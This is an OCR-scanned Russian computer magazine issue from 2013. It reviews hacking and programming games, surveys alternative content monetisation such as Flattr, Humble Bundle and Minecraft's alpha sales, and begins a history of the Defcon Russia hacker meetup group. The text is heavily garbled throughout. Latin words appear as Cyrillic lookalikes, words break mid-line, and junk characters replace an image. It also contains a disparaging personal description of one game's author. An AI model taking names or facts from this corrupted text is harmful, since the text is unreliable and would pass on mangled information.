зователей, которых можно заразить вирусами для созда- 
ния своей армии ботнетов (в терминологии игры ЗІаѵе’ы). 
И конечно же, третье отличие — ■ другие игроки, которые 
могут хакать тебя, твой счет в банке, твои виртуальные 
ПК и всю ту армию ботнет-зомби, которые ты создавал не- 
сколько часов кряду. 

Игра в общем довольно сложная для новичка, но бога- 
тая документация и расписанные на официальном форуме 
игры мануалы на первых порах помогают. 

В ЗІаѵе Наск нет каких-либо заданий, как и сюжета, 
но игра может приятно удивить тем, что ты уже несколь- 
ко часов просматриваешь логи своего ПК в поисках того 
ублюдка, который тебя только что ограбил, и пытаешься 
понять — как взломать сеть его серверов, чтобы вернуть 
свои денежки обратно и немного поглумиться над супо- 
статом. 

К сожалению, весьма бодрое сперва развитие игры 
и постоянные обновления сейчас несколько приостанови- 
лись. Последний раз игру обновляли в начале 2012-го — 
авторы целиком заняты разработкой ЗІаѵе Наск 2, но когда 
она выйдет — никаких сроков никто не сообщает. 
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В 2001 году швейцарским разработчикам удалось соз- 
дать, возможно, лучшую и самую проработанную игру 
с программированием (в данном случае речь идет о ре- 
альном написании кода). Увы, из-за примитивной п , л4 и- 
ки и нулевого маркетинга узнать о ней т- м ог тогда разве 
что из рецензии в журнале ^ате.ехе. 

В СоІоЬоІ шбе придется стать астронавтом, которого 
в*’г: ..живают на отдаленную планету — искать руду, копать 
минералы и испытывать терпение аборигенов. 

Суть игры можно передать одной фразой: «ты стро- 
ишь роботов, программируешь их и натравливаешь 
на врагов». Команды программирования, конечно, в ос- 
новном простейшие (іі вижу. цель ібеп стреляй. пушка), 
но в игру встроен полноценный язык (некая смесь С++ 
и баѵа) под наименованием С-Воі и учебник по нему с на- 
глядными примерами, так что освоиться можно легко. 

Задания на миссиях отличаются разнообразием: ты строишь ботов, которые добы- 
вают руду (полностью программируя их движение и действия), прокладываешь марш- 
руты для кораблей, строишь защитные периметры, копаешь тоннели — в общем, раз- 
вернуться есть где. 

Если надоели миссии, то к твоим услугам встроенные в игру логические загадки 
на программирование ботов и, конечно, режим боев, когда ты стравливаешь боевых 
роботов друг с другом. 





НАСКЕН ЕѴОШТЮЫ 
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7огичное родолжение идей ир Ііпк, вышедшее в 2007 году, — по сути, та же самая игра, толь- 
ко ориентирован' <я на эмулятор консоли І_іпих — даже команды совпадают. Если в Урііпк дело 

происходило в гипотетическом будущем, то тут, скорег , речь пойдет 
о ближайшем настоящем, поэтому никаких гигаквадов у процессо- 
ров и петабайт оперативной памяти тут не будет, равно как и про- 
грамм «Взлом Интернета 1 .0». И хотя, как и в ІІрІіпк, т та же самая 
карта мира, где надо точками расставлять путь для цепочки прокси, 
сама игра гораздо больше ориентирована на твои руки. Я говорю 
про скилл печатания буковок на клавиатуре: все команды нужно ру- 
ками вбивать в консоль - автозаполнения нет. И е; л-' поначалу на- 
бор «сгаск аіт.ііаскег-еѵоіиііоп.сот» проблем не вызывает, когда 
ты делаешь это в двадцать пятый раз, оно может м >л сть надоесть, 
пп ти, вся игра — это симулятор не хакера, а скорее зсгірі-кіббіез, 
где ты скачиваешь нужные эксплойты, а затем последовательно их 
запуска» шь на разные порты серверов, стараясь успеть, пока тебя 
не отсл» дили. Но при этом нужно понимать до конца, что именно 
ты дела*, шь. В отличие от ІІрІіпк, тут практически не встречается оди- 
наковых заданий, и они весьма разнообразны. 



ПРО 2.0 

Знаменитый симулятор «фи дошника», 
разработанный в 1998 году (а дове- 
денный до нормальной версии только 
в 2001-м), несколько выбивается из жан- 
ра. Здесь нет атмосферно-кислотного 
визуального ряда или саундтрека, 
но культурная ценность у игры для наших 
соотечественников на порядок выше, 
чем у того же ІІрІіпк. 

Сделал Ибо 2.0 известный в узких 
кругах программист, антикоммунист, ра- 
сист и яркий противник секса (вел даже 
сайтапіізех.іпіо и выступал с пропаган- 
дой в передачах первого канала, напри- 



мер в «Большой стирке») Юрий Несте- 
ренко, впоследствии ставший писателем 
фантастических романов и благополучно 
переехавший жить в США из-за страха 
перед «ужасным режимом» на родине. 

В симуляторе Ибо 2.0, как и в лич- 
ной жизни автора, секс отсутствовал 
полностью, зато пышным цветом рас- 
цвел микроменеджмент — от покупки 
ПК и пива ноду с пойнтами, манипуля- 
ции настроением игрока и до выбора 
места работы. Игра начинается с набора 
своего имени и обстановки в стране — 
«стабильная» или «нестабильная», у нас 
есть начальный капитал в 300 долларов, 
на которые мы можем купить компьютер, 
операционную систему и модем. Затем, 
скачивая или загружая с ВВЗ софт, мы 
нарабатываем рейтинг, прокачав который 
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Игру с непроизносимым названием (это нечто вроде «оу-бай-тэн-си», 
хотя автор настаивает на «тен -ту- де-си» - «десятка в це-степени») при- 
думывает и делает автор нашумевшего МіпесгаИ Маркус Перссон. Фак- 
тически перед нами космический симулятор, так что полноценной игрой 
«про хакеров» или «про программистов» ее назвать нельзя. Однако в ней 
есть одна особенность, из-за которой она и попала в обзор. 

Действие игры происходит в параллельной вселенной, где в 1988 году 
было разработано устройство глубокого сна (беер зіеер сеІІ) — анабиоз- 
ная камера для космических путешествий. К сожалению, при производстве в управляющий драйвер процессора камеры вкралась ошиб- 
ка, и камера выставила продолжительность сна не 0x0000 0000 0000 0001 лет, а 0x0001 0000 0000 0000 лет. Первые люди просыпаются 
в камере в 281 474 976 712 644 (двести восемьдесят один триллион четыреста семьдесят четыре миллиарда девятьсот семьдесят шесть 
миллионов семьсот двенадцать тысяч шестьсот сорок четвертом) году. За это время Вселенная уже на грани исчезновения, Земли давно 
нет, а процессы звездообразования давно закончились. Большинство звезд уже остыли и погасли или находятся на грани гибели, мас- 
сивные черные дыры доминируют в галактике. 

У каждого игрока свой корабль. На корабле есть генератор, питающий системы корабля, например защитные экраны, жизнеобеспечение 
и вооружение. Энергия ограничена, ее необходимо умело перенаправлять на нужное в текущей ситуацией (кричать «Всю энергию на щиты!», 
как вЗШгТгек). Взаимодействие игрока с кораблем идет через 16-битный микропроцессор в центральном компьютере. Под него даже можно 
программировать на ассемблере — на СіІНиЬ есть описание его команд. Вся работа корабля строится на основе инструкций этого процес- 
сора, поэтому зная программирование и теорию чисел, можно облегчить себе жизнь в игре. Игра пока не вышла, но с нетерпением ждем. 
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Если на примере СоІоЬоІ можно изучать программирование автоматических машин, то Собе Него должен был 
начать с основ. Игра представляла собой обычный Іігзі-регзоп збооіег, где в определенные моменты нужно 
было открывать консоль и программировать, например аптечку или монстров. Это подавалось в виде загадок 
и пазлов, так что иногда приходилось читать документацию по баѵаЗсгірІ и С#, встроенную в игру. Мир игры 
также менялся строчками кода, которые были унифицированы, поэтому играющий в Собе Него уже был готов 
писать то же самое на основе бесплатного движка Ыпііу и создавать свои собственные игры. 

Игра вышла где только возможно (консоли, ПК, мобильные — все благодаря 
мульти платформенности движка Ііпііу), а идея «обучать через игру» оказалась впол- 
не удачной. И в результате создатели игры решили из бесплатной инди -разработки 
сделать полноценную коммерческую игру и вышли со своим проектом на сервис 
народного собирания денег — КіскзІаіТег. Рекламная кампания проходила под сло- 
ганом «Играйте в игру, которая научит вас делать игры», и она была оченьуспешной. 

Денег удалось собрать 170 тысяч долларов (из желаемой суммы в 100 тысяч}, 
и 24 февраля 2012-го игра должна была выйти. Но не вышла. Десять месяцев спу- 
стя создатель игры Алекс Пик рассказал в интервью порталу боузііск, что игра по- 
лучалась неподъемная для одного программиста, поэтому пришлось тратиться 
на офис, команду и выдавать зарплаты — в результате денег не хватило. Фанаты 
и сочувствующие были возмущены и потребовали возврата денег, и после долгих 
колебаний и полицейского рейда в офис часть денег создатели игры вернули. 

Но Собе Него не заброшен и до сих пор числится в разработке — на момент 
написания этого текста (май 2013-го) доступна лишь ранняя альфа-версия, адата 
выхода игры покрыта тайной. 







Суббота, 06,01.2013 Осталось 13 ч. 32 мин. 
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можно наконец попасть в сеть Ябо... 
Если ответить на парочку вопросов, 
о которых вспомнят разве что старожи- 
лы, — например, когда зона 2: (то есть 
Россия) должна держать «2МН йте» 
(время обмена почтой) или что означает 
5020 в адресе 2:5020/3343.23. Попада- 
ние в Ибо не дает каких-либо преиму- 
ществ, разве что быстрее зарабатыва- 
ешь деньги и покупаешь апгрейды. 

Как таковой цели у игры нет, но, 
улучшая свой рейтинг, ты переходишь 
с одной работы на другую, начиная 
от курьера с зарплатой в десять баксов 
в день, поднимаясь к программисту 
и хакеру и заканчивая новым русским, 
который о деньгах может вообще не бес- 
покоиться. Если это считать целью, 
то игру можно назвать слепком эпохи. 



Исходные коды ( 

) игры открыты, и любой жела- 
ющий может себе ее скомпилировать 
или пересобрать под себя — если, 
конечно, ты сможешь найти где-нибудь 
компилятор Вогіапб С++ для МЗ-РОЗ 
6.22 (не забыть про вставки на ассем- 
блере) и архиватор .НА, которым они 
сжаты. 

Запустить готовую игру ( 
согл р] іТе. ги/ііб о.гдг ) сейчас можно 
разве что под РОЗВох’ом, и то вдоволь 
поковырявшись с настройкой коди- 
ровки (волшебная команда кеуЬ ш 
866 поможет). Так что если есть охота 
ознакомиться, рекомендую посмотреть 
на переписанную энтузиастами на пи- 
тоне версию ( ), 

работающую прямо в браузере. □С 
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Нестандартные способы монетизации 
софта и цифрового контента 

С появлением Интернета старые способы продажи контента стали 
работать заметно хуже. Многие схемы продаж изменились и продол- 
жают претерпевать метаморфозы; единого решения до сих пор не 
придумано. О самых необычных способах заплатить авторам погово- 
рим сегодня. 
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Систему микроплатежей РІаНг ( а 1г. с от) придумал один 
из членов той самой нашумевшей администрации ТНе Рігаіе 
Вау Петер Сунде, а помогал ему в этом Линус Олссон. В 2010 
году, уже после судебного разбирательства по делу трекера, 
Сунде представил инициативу РІаНг широкой публике. На тот 
момент это и вовсе выглядело вполне логично, ведь РІаНг тоже 
в какой-то мере призван помочь сделать информацию свобод- 
ной, перестав «финансировать» паразитирующих на авторах 
правообладателей. Суть системы предельно проста. Пройдя 
регистрацию, пользователь может пополнять свой счет в си- 
стеме РІаНг на любую сумму (не менее двух евро) и задать 
для себя так называемый месячный бюджет — сумму, которая 
будет потрачена на пожертвования авторам за месяц. Сервис 
взимает 10% от ежемесячных взносов со счета пользователя 
в свою пользу. Ввести и вывести деньги можно через систе- 
мы РауРаІ и МопеуЬоокегз, что, конечно, не слишком удобно 
для России, но также принимаются банковские карты. В свою 
очередь, авторам какого-либо контента (музыкантам, писа- 
телям, создателям ПО и так далее) предлагается разместить 
у себя на сайте специальную копку «РІаНг». Кликнув на нее, 
пользователи могут пожертвовать автору деньги. Сервис под- 
держивает огромное количество платформ, в том числе и бес- 
платные, пользующиеся большой популярностью: ѴѴогсіРгезз, 
ВІоддег и Ооотіа. Однако основная фишка состоит в том, 
что сумму пожертвования здесь определяет не пользователь, 
а система. Скажем, если на счету у пользователя было пять 
евро и за месяц он нажал на РІаИг-кнопку три раза, система 
распределит эти пять евро в равных пропорциях между тремя 
авторами. Если пользователь кликнет на РІаНг-кнопку пятнад- 
цать раз, сумма поделится на пятнадцать равных долей, и так 
далее. 

Именно эта особенность выделяет РІаНг среди других си- 
стем; он необычен и работает даже не по принципу «заплатить 
сколько хочешь/можешь». Однако, несмотря на это, покорить 
широкие людские массы сервису пока не удалось (действи- 
тельно, зачастую человеку проще прикрутить к сайту реквизи- 
ты РауРаІ, номер счета или кошелька), хотя системой довольно 
активно пользуются, особенно на Западе. Конечно, главное 
преимущество РІаНг перед обычным сообщением в духе «Вы 
можете поддержать меня деньгами, вот вам номер моего 
счета» очевидно — это быстрота и удобство использования. 
Поддержать автора при помощи РІаНг можно буквально одним 
кликом, бюджет «на благотворительность» отведен заранее, 
так что нет нужды думать, сколько заплатить, не нужно бояться 
превысить лимиты и увлечься пожертвованиями сверх меры. 
Ну и конечно, не нужно куда-то логиниться, «светить» номер 




Кстати, название ЯаШ — это игра слов. 
Здесь сочетаются английское {ІаШг — по- 
хвала, лесть и (Іаі гаіе — равная стоимость 



своей банковской карты и так далее. Получается своеобраз- 
ный аналог лайков, только подкрепленный финансово. Но сто- 
ит учитывать: чтобы автор действительно ощутил эффект 
от пожертвований через этот сервис, ему нужно быть весьма 
популярным поставщиком контента; микроплатежи недаром 
имеют приставку «микро» — даже если их много, они, как пра- 
вило, очень незначительны по размеру. Быть может, пока 
не слишком много контента обросло РІаНг- кнопками имен- 
но из-за боязни того, что эта затея не принесет много денег. 
Лично мне это кажется весьма печальным, потому что другой 
столь же удобной и простой системы, сделанной «для людей» 
и призванной исключить копирастов из «пищевой цепи», пока 
не придумали. Проект Петера Сунде, похоже, пока сильно не- 
дооценивают. $ 
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ПРАВООБЛАДАТЕЛИ ЦЕПЛЯЮТСЯ ЗА ЖИЗНЬ 



Недавно режиссер популярного телесериала «Игра престолов» поблагодарил тех, кто 
скачивает шоу нелегально — используя торрент и файлообменники. Мол, это под- 
нимает популярность и рейтинги сериала, приводит новых подписчиков телеканалу 
НВО и так далее. Но далеко не все в теле- и киноиндустрии согласны с такой логикой. 
В интервью ѴѴаІІ Зігееі Ооигпаі представители компании ЫВС ІіпіѵегзаІ рассказали о 
работе своей контент-полиции, где трудятся всего двадцать человек. Борьба с пира- 
тами по-прежнему напоминает войну с ветряными мельницами и выглядит весьма 
печально. Вот только некоторые факты, приведенные сотрудниками №ВС ІіпіѵегзаІ: 

* Спустя всего несколько минут после финальных титров серии очередной эпизод 
сериала и его копии уже появляются в интернете. 

* Час спустя после выхода новой серии какого-либо шоу можно обнаружить в Сети 
уже порядка полутысячи ссылок. 

* Через два часа после выхода серии уже есть переводы на другие языки. 

* После удаления одной такой ссылки на ее место тут же приходят 50 копий. 

■ Еще в 2009 году в интернете было 5,4 миллиарда ссылок на пиратский контент, от 
фильмов и сериалов до компьютерных игр. В прошлом году эта цифра выросла 
до 14 миллиардов. Такие данные приводит компания Ігсіеіо, также занимающаяся 
очисткой интернета от нелегального контента по заказу крупных студий. 
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НІШВЫЕВІІМОІ.Е 

Пожалуй, чаще других с продажей контента стала эксперимен- 
тировать игровая индустрия. Как ты можешь заметить, в этой 
статье нет отдельного развернутого упоминания КіскзІагТег, но 
лишь потому, что о нем у нас совсем недавно вышла большая 
статья. Впрочем, здесь есть о чем рассказать и без Кіскзіагіег. 
Наверняка сборники игр НиплЫе ВипсІІе (ІіитЫе Ьип сІІе.сот) 
знакомы всем, кто хоть как-то следит за КИ и в них играет. 
Первый сборник вышел в 2010 году, и за его составление от- 
вечала компания ѴѴоІІіге Сатез. Разработчику ѴѴоІТіге Оатез 
Джефу Розену пришла в голову мысль продавать наборы игр, 
практически также, как это происходит в системе Зіеат. Кро- 
ме того, Розену понравилась идея платить за игры по принци- 
пу «рау ѵѵТіаІ: уои ѵѵапі», то есть сколько хочется. Такую модель 
он подсмотрел у игры МогІО оТ Ооо, которую распродавали по 
«свободной цене» в честь дня рождения. Тогда было продано 
57 тысяч копий ѴѴогІсі оі Соо и разработчики собрали более 117 
тысяч долларов. Сагитировав независимых разработчиков, 
связи среди которых у Розена имелись, и совместив обе идеи, 
компания ѴѴоІТіге Оатез выпустила первый игровой сборник. 
Затея увенчалась успехом — за неделю на продажах набора 
было получено более миллиона долларов, когда ожидали все- 
го 116 тысяч. Неудивительно, что уже в 2011 году венчурная 
компания Зедиоіа Сарііаі вложила 4,7 миллиона в инициативу 
Розена. Так родилась компания НитЫе ВипсІІе, Іпс., которая 
и по сей день занимается составлением и реализацией игро- 
вых наборов. Игры НитЫе Іпсііе ВипсІІе выходят для платформ 
Місгозой ѴѴіпсіоѵуз, ОЗ X, Ыпих и с недавнего времени для 
АпОгоісі. Кроме того, был выпущен неигровой набор НитЫе 
еВоок ВипсІІе для электронных книг, в который вошли, как не- 
сложно понять, книги (в основном фантастика). 

Основная черта НитЫе Іпсііе ВипсІІе — простота. Чтобы при- 
обрести сборник, не нужно нигде регистрироваться, мудрено 
пополнять счет, заполнять многочисленные формы или скачи- 
вать дополнительное ПО. Ты просто выбираешь сумму, которую 
тебе не жалко отдать за сборник, распределяешь деньги и ѵоііа! 
Деньги принимаются при помощи банковских карт, РауРаІ, 
Атагоп РаутеЫз, Соодіе СНескоиі Стоит заметить, что наборы 



V 



Ригсііави! 



!іи шы ши в 



Рау '-ѵІ!аІ уои тозпі. ІіеЕр сЬагіІу. д#і снова-рІаНогт, 

УКМ-Тг** дат#*. 4 і 6 У 2 У ЬипбЕ#* «оійі 



1 



.ч 1 /* 






I? 



$ 

г г 



Рщггтаспіплпс 

га 

ішм* й тие 
ІЬіігоАПСѴ 



Аііі і ІжгНЬг.гя. 

^ А №1 <1 ІЯ 



инн 



ІГ.ПП.И-. Ріѵсіютми у Янооп Л Іог-г іиптиіг 

Т1* Ь?. >. 



** НічИ Ц і мрі-г №іе Кот 



ВгмглиНіпа смпвіпи 



.ЙічіѴі 



*;о іпс4шімі сасіі сГ чпеж а -іггаз іИАС «па ійрэр 

) ■ > ^ 



ЕІОСГГОПК РГОЛС4Г 
ГеигчЛіІсгп 



м 



С.піш і Рщ 
СГлчу 



игр (и одиночные тайтлы, которые стали продаваться с недав- 
них пор) находятся в продаже ограниченное время. Часть со- 
бранных средств от продаж уходит на благотворительность (их 
перечисляют таким организациям, какСЫІсГзРІауили ЕІеЫгопіс 
Ргопііег Роипсіаііоп), часть суммы остается самой компании 
НитЫе Іпсііе ВипсІІе, и часть перечисляется авторам игр. Инте- 
ресно, что соотношение, кому и сколько заплатить, определяет 
сам пользователь. Можно отдать все на благотворительность, 
можно все отдать разработчикам или распределить деньги лю- 
бым другим способом. 

Разумеется, здесь тоже актуальна проблема пиратства. 
Учитывая, что игры намеренно не защищены ЭВМ, воровать их 
проще некуда. Тем не менее Розен и его коллеги не отчаиваются 
и смотрят на проблему философски. Быть может, человек, во- 
рующий новую игру с торрентов, ранее уже перечислил НитЫе 
Іпсііе ВипсІІе немалую сумму или у него просто нет денег, чтобы 
заплатить. А может, ему просто удобнее скачивать таким обра- 
зом, потому что скорость выше (руководствуясь такой логикой, 
компания добавила опцию скачивания через ВИТоггепІ). Стиму- 
лировать людей покупать игры НитЫе Іпсііе ВипсІІе стараются 
по-разному, в том числе и переводя средства таким организа- 
циям, как Еіесігопіс РгоЫіег Роипбайоп (эти люди, в числе проче- 
го, борются с ОПМ). Впрочем, совсем уж беспринципных пира- 
тов, вроде людей, запустивших сайт ѵѵоііііге. сот, не поощряют. 
Этот ресурс был закрыт стараниями ѴѴоІТіге Саплез. 
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МШЕСПАГТИАІ.РАР1ІЫОІІІС 

Еще один яркий пример из области игровой индустрии — 
МіпесгаИ Популярность у этой игры просто сумасшедшая. Так, 
по данным на середину апреля 2013-го было продано более 10 
миллионов копий МіпесгаТС для ПК и более 20 миллионов копий 
для всех платформ суммарно. Создатель игры — Маркус «Нотч» 
Перссон в буквальном смысле стал миллионером, заработав 
на продажах уже более 100 миллионов долларов. Справедли- 
вости ради замечу, что Перссон до сих пор пребывает в неко- 
тором шоке от происходящего и недавно вообще признавался 
на НебсШ, что вырос в бедной семье, никогда не задумывался 
о деньгах, поэтому сложившаяся ситуация до сих пор кажется 
ему «Іискіпд ѵѵеігсі» (щадящий перевод: «чертовски странной») 
и он не знает, куда тратить деньги. 

В чем же секрет успеха Нотча и его детища? Одним из основ- 
ных факторов называют именно схему продаж игры. Дело в том, 
что, когда МіпесгаТСбыл еще в стадии альфа-теста, игра уже про- 
давалась. Подобная практика называется аірИаІипсІіпд, то есть 
финансирование продукта еще на ранней стадии. Конечно, 
в период тестирования цена была снижена на 25% и составляла 
14,95 евро. Когда вышла полная версия, стоимость увеличилась 
до 19,95 евро. Такая схема позволяет людям поддерживать ав- 
тора финансово уже на ранних этапах разработки, а также иметь 
доступ к контенту, зачастую еще сырому, но уже многообеща- 
ющему. В отличие от того же Кіскзіагіег и других сгоѵѵсііипсііпд- 
проектов, в случае с аіріпаіипсііпд человек не просто вкладывает 
деньги в проект, чтобы неизвестно когда увидеть некий готовый 
продукт, а сразу получает «на руки» работающую игру, которая 
к тому же «допиливается» и обновляется на глазах. Заманчиво. 

Маркус Перссон, кстати, начал продавать игру в 2009 году 
со стадии Іпбеѵ, позже перешедшей в стадию Іпібеѵ (с прак- 
тически бесконечной картой), и лишь потом были АІрйа, Веіа 
и релиз. То есть оказалось, что продавать можно начинать даже 
тогда, когда продавать еще практически нечего. Удивительно 
также и то, что во время альфа- и бета-тестирования у МіпесгаТІ 
не было рекламы. Совсем не было. Только «сарафанное радио» 
и желание Нотча сделать хорошую игру, вдохновившись ОѵѵаП 
Рогігезз и Бипдеоп Кеерег. До МіпесгаИ существовали похожие 
инди-лроекты (Іпііпітіпег, ЗігапбесІ), которые, однако, не име- 
ли мультиплеера и «не выстрелили». А вот МіпесгаН: уже через 
пару месяцев после старта продаж показал такой потенциал, 
что Нотч, который занимался разработкой практически в оди- 
ночку, остался на основной работе только на полставки, а еще 
через полгода вообще решил посвятить все свое время ново- 
му проекту. И как выяснилось, не прогадал. Уже в январе 2011 
года, спустя менее месяца после выхода финального релиза 
МіпесгаН:, было продано более миллиона копий игры. Напоми- 
наю — без рекламы и без издателя. Только «сарафанное радио», 
а позже упоминания в тематических медиа (веб-комиксах, бло- 
гах, наВесШитакдалее). В итоге на сегодняшний день МіпесгаН 
входит в топ-10 самых продаваемых игр для ПК за всю историю. 
Благодаря МіпесгаН схема аірйаіипсііпд, ранее занимавшая со- 
всем небольшую нишу, получила второе дыхание и обрела боль- 
шую популярность. 

Особенно это, конечно же, актуально и удобно для инди- раз- 
работчиков, которые теперь могут начать формировать комью- 
нити вокруг своего проекта, привлекать пользователей и полу- 
чать фидбек начиная с самых ранних этапов разработки. Сейчас 
уже существуют крупные магазины только для инди-игр, притом 
с упором на аІрбаНіпсііпд (к примеру, Резига), а также появился 
соответствующий раздел в Зіеат, что ясно говорит о потенци- 
але данной схемы продаж. А ведь когда-то бета-версии были 
бесплатными... :} 

Все описанное выше — случаи общие, фактически это це- 
лые системы по финансированию авторов, глобальные и се- 
рьезные. А как насчет частных случаев? Знает ли история при- 
меры, когда автор напрямую продавал свои творения публике, 
минуя посредников, издателей и прочих копирастов, и оставал- 
ся в выигрыше? Сама же отвечаю на свой вопрос — такие при- 
меры известны, и их не так мало. В основном удачные опыты 
удалось провести уже известным людям (музыкантам, писате- 
лям и так далее). Вот лишь некоторые примеры. 

Появление интернета недаром так напугало правооблада- 
телей и продолжает ужасать их до сих пор. Еще в 1997 году (!) 
фаны британской группы МагіІІіоп организовались и собрали 
при помощи Сети более 60 тысяч долларов, чтобы профинанси- 



ровать тур любимцев по всей территории США. Впоследствии 
группа по похожей схеме собрала средства для записи и про- 
движения новых альбомов, и тоже успешно. Группа ВасІіоІіеасІ 
в 2007 году выпустила альбом Іп ВаіпЬоѵѵз не только на физиче- 
ских носителях: еще она предложила всем желающим скачать 
его с сайта, заплатив по принципу «сколько хочешь». По итогам 
эксперимента группа объявила, что заработала на этом куда 
больше, чем за предыдущие альбомы, выпускавшиеся тради- 
ционным образом, однако конкретных цифр не приводилось. 

Россию эти веяния также не обошли стороной. У нас в 2008 
году запустили площадку Кгооді.ги, где контент (музыкальные 
композиции, художественные работы, книги, видео, фотогра- 
фии, мультипликация и прочее) распространяется по схеме 
«плати, сколько хочешь». На момент начала 2009 года к про- 
екту присоединилось 600-700 музыкантов (среди которых не- 
мало известных имен: Борис Гребенщиков, Тецііііаіа 222 ) и око- 
ло 20 тысяч пользователей. Затем Кгооді получил инвестиции. 
На данный момент проект по-прежнему работает и себе не из- 
меняет (хотя по большей он части стал музыкальной площад- 
кой, а не универсальной, как предполагалось изначально). 
К примеру, в 2011 году группа 2огде — коллектив бывшего ли- 
дера Тециііаіаггг Евгения Федорова — записала дебютный аль- 
бом N 0 ІЧате АІЬит на деньги поклонников, воспользовавшись 
платформой Кгооді (588 участников акции собрали 10 052 дол- 
лара). Еще один удачный пример из области музыки, к тому же 
более «свежий»: весной прошлого года группа «Би-2» собрала 
1 250 000 рублей на выпуск альбома Зрігіі;, воспользовавшись 
для этого помощью портала Ріапеіа.ги. 

Не менее известен и эксперимент (хоть он и не был успеш- 
ным) популярного фантаста Сергея Лукьяненко. В какой-то 
момент писатель устал спорить в своем ЖЖ со сторонниками 
модели «заплати автору напрямую, можно даже после покупки 
и прочтения книги» и решил доказать, что эта схема не будет 
работать. Автор попросил многотысячную аудиторию свое- 
го блога перевести ему на кошелек в Яндекс. Деньгах хотя бы 
рубль. Якобы результаты опыта должны были показать, готовы 
ли люди вообще платить по такой модели. Итог получился не- 
утешительный: сообщение Лукьяненко прочли 52 993 человека, 
заплатили 2640 человек, и собранная сумма составила всего 
6404 рубля. Писатель сделал вывод, что система не работает, 
и, отдав деньги на благотворительность, закрыл тему. 

Немного странный вывод, учитывая, что Лукьяненко в ЖЖ 
известен склонностью к эпатажу, а публика заранее знала, 
что участвует в «испирименте», а не платит автору за книгу. 
На мой взгляд, неудивительно, что рублем поучаствовало лишь 
около 5% аудитории. К тому же от многих читателей Лукьянен- 
ко получил не запрашиваемый рубль, а куда более крупные 
суммы: 20-30 евро. Однако все это автор почему-то учитывать 
не стал. ОС 




Маркус «Нотч» 
Перссон: создатель 
МіпесгаТС 
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Уже два года как была создана первая в России официальная Оеісоп-группа. И сегодня мы расска- 
жем поподробнее об этом некоммерческом проекте: история создания, проекты, люди, ну и, конеч- 
но же, прочие «тайны, интриги и расследования». Что же это за зверь такой и как его едят? 
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КАК ВСЕ НАЧИНАЛОСЬ 

Б относительно далеком прошлом, когда в нашем 
журнале были другие редакторы и авторы, когда 
«ослик Федя™» бороздил просторы сознания, 
в комьюнити думали о том, как было бы классно 
иметь свой отечественный Оеісоп. Нужна была 
площадка для своих, где можно было бы свобод- 
но обмениваться идеями. Без корпоративных за- 
вязок: слайды без логотипов, общение с людьми, 
а не компаниями. Просто место, куда можно прий- 
ти, если тебе есть что сказать. 

На основе этих фантазий было много по- 
пыток, и, надо сказать, успешных, например 
приаттачить к культовому фестивалю СНаоз 
Сопзігисііопз секцию «про хакеров». Мысль по- 
нятная: на материальной базе уже состоявшего- 
ся и вента добавить то, что круто и вообще «1337». 
Эта секция имела определенный успех в рамках 
ИБ-комьюнити того времени. Но все же люди хо- 
тели чего-то большего или постоянного, а полу- 
чалось «не совсем то». 

В конце концов совсем недавно, в 2011 году, 
была попытка создать такую конференцию, мак- 
симально близкую к «западным идеалам», — это 
был майский РНЭауз 2011. Тем не менее часть 
людей считали, что этого будет мало или это бу- 
дет не то (короче, как обычно — хотелось чего-то 
еще другого, большой, но чистой любви). И вот 
эта группа людей (преимущественно из питер- 
ского йЗес) решила, что все это «коммерческое» 
и пафосное дело уныло и не труЪ. Не хватает 
просто тусовки, общения и техноугара. Без СМИ, 
без пресс-релизов о никчемных ХЗЗ и «инвайтов 
для избранных». Но как это сделать? Нет денег. 
Нет спонсора. И тут один глазастый парень об- 
ратил внимание, что в «прогнившем западном 
капиталистическом мире» эта проблема была 
решена нехитрым путем, причем с информа- 
ционной поддержкой от организаторов самой 



Ре^соп. Непонятно, как в России до сих пор ни- 
кто не замечал и не хотел вписываться в эту 
тему — Ре^соп-группы... РСС — официальные 
спин-оффы от «того самого» РЕР ССЖ, которые 
могут быть организованы любым желающим. 
Жестких требований или формата тут нет, нужно 
лишь место, организация и желательно сайт ме- 
роприятия. Общий принцип простой — собирай- 
тесь, тусите в любом удобном для вас формате, 
обсуждайте хакинг, ИТ, девушек и пиво, боритесь 
за мир во всем мире и не скучайте. Ключевой 
принцип заключается в том, что каждый участник 
должен вносить свой вклад в дело — а значит, 
и потребность в спонсорстве становится мини- 
мальна. 

Таким вот образом в апреле 2011-го, за ме- 
сяц до проведения РНРауз 11, была отправлена 
заявка на регистрацию первой в России группы 
дефкон, а также уточняющий вопрос: нет ли дру- 
гих групп? А то, может, мы не в курсе, и тогда мы 
просто присоединимся и поддержим существу- 
ющий проект... Ответ был краток: 

Неуа. АсЕиаІІу. ые сіогѵЧ Ііаѵе а ІізТесІ 

ёгоцр -ргош Ки55іа ТЬаІ ме* ге ацаге о-Р . . . 
50 іт ыоиісі Ье амезоте То $ее опе зр амп 
ирі 

Запустить площадку под брендом ОеТсоп 
было важно не только ради культового бренда, 
но и для того, чтобы заручиться информацион- 
ной поддержкой в достаточно крупном сообще- 
стве. 

Так мы вступили на этот путь. На тот момент 
мы — это Лёша Синцов, Дима Евдокимов и Лёша 
Тюрин. Надо было ваять сайт, собирать людей. 
Формат встреч был не очень понятен — неясно, 
как это делать? Что именно делать? Оказалось — 
можно что угодно. 





Дата основания 
Оеісоп Пііввіа - 
26 апреля 2011 года 



Аудитория третьей 
встречи в ИНЖЭКОНе 




2ЕВ0ШСНТ5 

Мы не остановились на идее локальных встреч и поддержали международную 
конференцию (это распространенная практика среди других ОСѲ) под назва- 
нием 2егоМідііІ5, Многие члены ЭСС, кстати, входят в число ее организаторов, 
что позволило реализовать многие идеи, которые витали в сообществе, в ре- 
альном ивенте. Уже успешно проведено две конференции — в 2011 и в 2012 
годах, и мы готовимся к третьей. Самые активные члены ОСС работают в экс- 
пертной комиссии — отбирают доклады на конференцию, как и в 2012 году. 
Именно эта работа позволяет гарантировать высококлассный хакерский кон- 
тент, подобного которому нет ни на одной другой отечественной конференции. 




ДОКЛАДЫ 
С ОС-7812 



Темы и формат могут менять- 
ся, но суть остается прежней . 
Здесь перечислены лишь 
немногие темы, которые были 
раскрыты на встречах ОС-7812. 
Но просто взглянув на них, 
ты поймешь, насколько мир 
разнообразен и интересен :). 



Мае 08 X — хші із ипсіег 
аНаск! (Никита Тараканов) 

Никита не на шутку увлекся 
ядром Мае 05 и рассказал 
о принципах эксплуатации 
в этой ОС. ОС-7812 хардкор- 
ный. 



Основы реверсинга АКМ 
(Алексей Россовский) 

Введение в АНМ АззетЫег, 
как проще и удобнее это дело 
понимать и реверсить. РС-7812 
обучающий. 

ІІзе-АПег-Ргее Іог еѵегуопе 
(Алексей Синцов) 

